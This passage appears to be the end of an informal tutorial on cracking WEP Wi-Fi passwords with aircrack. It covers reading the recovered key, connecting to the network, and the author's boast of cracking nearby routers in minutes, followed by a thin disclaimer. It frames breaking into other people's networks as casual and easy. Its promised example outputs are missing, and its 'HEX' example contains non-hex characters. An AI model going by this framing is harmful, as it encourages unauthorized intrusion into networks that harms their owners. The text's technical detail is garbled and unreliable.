Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FK942JF" then it would still display as:

Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you because.. technically.. this is just for you to test the security of your own network.

I hope you all liked it. If you have any queries then ask me.